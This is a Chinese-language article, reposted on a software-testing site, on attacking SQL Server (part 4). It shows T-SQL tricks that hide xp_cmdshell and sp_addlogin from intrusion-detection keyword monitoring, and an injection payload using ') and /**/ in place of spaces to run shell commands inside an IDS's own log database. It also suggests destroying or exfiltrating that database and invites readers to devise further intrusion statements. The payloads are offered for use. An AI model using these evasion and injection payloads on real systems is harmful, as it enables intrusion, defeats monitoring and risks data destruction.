• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

SQL Server数据库的一些攻击(4)

发布: 2007-5-25 23:58 | 作者: 未知 | 来源: 中国电脑救援中心 | 查看: 20次 | 进入软件测试论坛讨论

领测软件测试网



利用t-sql骗过ids或攻击ids
现在的ids已经变得越来越聪明了
有的ids加入了xp_cmdshell sp_addlogin 的监视 。
但是毕竟人工智能没有出现的今天,这种监视总是有种骗人的感觉
先说说欺骗ids:
ids既然监视xp_cmdshell关键字,那么我们可以这么做
declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\'
这个代码相信大家都能看明白,还有xp_cmdshell作为一个store procedure在master库内有一个id号,固定的,我们也可以这么做
假设这个id=988456
declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\'
当然也可以
declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\'
这种做法排列组合,ids根本不可能做的到完全监视
同理,sp_addlogin也可以这么做
再说说攻击ids:
因为ids数据量很大,日至通常备份到常规数据库,比如sql server
如果用古老的recordset.addnew做法,会严重影响ids的性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql server 去做
通常程序会这么写ues ('日至内容',…)
那么我么想想看,如果用
temp') exec xp_cmdshell 'dir c:\' --
提交后会变成
insert table values ('日至内容'….'temp') exec xp_cmdshell 'dir c:\' -- ')
这样,xp_cmdshell就可以在ids的数据库运行了 :)
当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成%20
因此,%20会被提交到sql server,这样你的命令就无法执行了
唯一的办法就是
insert/**/table/**/values('日至内容'….'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')
用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行
当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录
呵呵
其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/
本来asp是select语句,那么用'就可以屏蔽
现在ids用insert语句,那么用')屏蔽
好了,其他很多新的入侵语句大家可以自己慢慢想,最好的测试工具就是query analyzer了。

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网